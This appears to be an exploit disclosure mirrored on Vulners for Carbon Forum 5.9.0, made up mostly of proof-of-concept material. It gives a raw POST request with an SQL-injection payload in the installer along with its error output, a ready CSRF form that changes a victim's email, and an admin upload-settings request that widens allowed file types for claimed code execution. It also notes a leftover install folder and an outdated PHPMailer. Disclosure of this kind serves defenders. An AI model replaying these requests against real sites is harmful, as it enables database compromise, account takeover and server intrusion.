Vulners
Lucene search
Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection
`{-} Title => Carbon Forum 5.9.0 - Multiple Exploits
{-} Author => bRpsd [[email protected]]
{-} Date Release => 22 June, 2024
{-} Vendor => Carbon Forum <= 5.9.0
Homepage => https://www.94cb.com/
Download => https://github.com/lincanbin/Carbon-Forum
Vulnerable Versions => 5.9.0 >=
Tested Version => 5.9.0 on xampp Server.
#######################################################################################
Vulnerability #1 : Reset Administrator Password & Database settings
File Path: http://localhost/Carbon-Forum/install/
INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user
#######################################################################################
#######################################################################################
Vulnerability #2 : SQL Injection
Vulnerable Code: /Carbon-Forum/install/index.php
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
$fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。 The SQL File could not be opened.");
//dobefore
if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {
$Language = $_POST['Language'];
$DBHost = $_POST['DBHost'];
$DBName = $_POST['DBName'];
$DBUser = $_POST['DBUser'];
$DBPassword = $_POST['DBPassword'];
$SearchServer = $_POST['SearchServer'];
$SearchPort = $_POST['SearchPort'];
$EnableMemcache = $_POST['EnableMemcache'];
$MemCachePrefix = $_POST['MemCachePrefix'];
} else {
die("An Unexpected Error Occured!");
}
//$WebsitePath = $_POST['WebsitePath'];
$WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {
$WebsitePath = $WebsitePathMatch[1];
} else {
$WebsitePath = '';
}
//初始化数据库操作类
require('../library/PDO.class.php');
$DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);
$DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));
if (empty($DatabaseExist)) {
$DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");
}
POC Request:
POST http://localhost/Carbon-Forum/install/?
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 173
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/Carbon-Forum/install/
Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / Install
Response:
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1
You can find the error back in the log.
#######################################################################################
################################################################################################################
Vulnerability #3 : CSRF - Change users email
File Path: http://localhost/Carbon-Forum/settings
Method: POST
Parameter : UserMail
Code:Carbon-Forum/controller/settings.php
POC:
case 'UpdateUserInfo':
$CurUserInfo['UserSex'] = intval(Request('POST', 'UserSex', 0));
$CurUserInfo['UserMail'] = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];
$CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));
$CurUserInfo['UserIntro'] = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));
$UpdateUserInfoResult = UpdateUserInfo(array(
'UserSex' => $CurUserInfo['UserSex'],
'UserMail' => $CurUserInfo['UserMail'],
'UserHomepage' => $CurUserInfo['UserHomepage'],
'UserIntro' => $CurUserInfo['UserIntro']
));
if ($UpdateUserInfoResult) {
$UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];
<form method='POST' action='http://localhost/Carbon-Forum/settings'>
<input type="hidden" name="Action" value="UpdateUserInfo">
<input type="hidden" name="UserSex" value="0">
<input type="hidden" name="UserMail" value="[email protected]">
<input type="hidden" name="UserHomepage" value="">
<input type="hidden" name="UserIntro" value="">
<input type='submit' value='submit'>
</form>
################################################################################################################
#######################################################################################
Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated]
Info: Administrator can change allowed files in dashboard -> parameter
POC POST:
http://localhost/Carbon-Forum/dashboard#dashboard4
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Content-Type: application/x-www-form-urlencoded
Content-Length: 14662
Origin: http://localhost
Connection: keep-alive
Referer: http://localhost/Carbon-Forum/dashboard
Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Action=Parameter&UploadParameters=/* 前后端通信相关的配置,注释只允许使用多行方式 */ { /* 上传图片配置项 */ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 4096000, /* 上传大小限制,单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "", /* 图片访问路径前缀 */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* {filename} 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制,单位B */ "scrawlUrlPrefix": "", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制,单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 */ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "", /* 视频访问路径前缀 */ "videoMaxSize": 20480000, /* 上传大小限制,单位B,默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "", /* 文件访问路径前缀 */ "fileMaxSize": 2048000, /* 上传大小限制,单位B,默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 60, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径前缀 */ "fileManagerListSize": 60, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键词过滤相关的配置,注释只允许使用多行方式 */ { /* 关键词均支持正则表达式,过多的过滤会影响性能 "fuck" : "f**k", 以上规则表示发表含fuck的内容,会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], 以上规则禁止发布含“蛤”的内容,并且尝试发表该内容的用户会被续(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包子" : ["维尼", 30], 以上规则表示发表含"包子"的内容,会被过滤为"维尼",并且在内容发表成功后,需要再等30秒才能发言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */ }&submit=Save settings
#######################################################################################
#######################################################################################
Vulnerability #4 : Vulnerable PHPMailer library
File: /Carbon-Forum/library/PHPMailer.class.php
Version: $Version = '5.2.16';
#######################################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jun 2024 00:00Current
7.4High risk
Vulners AI Score7.4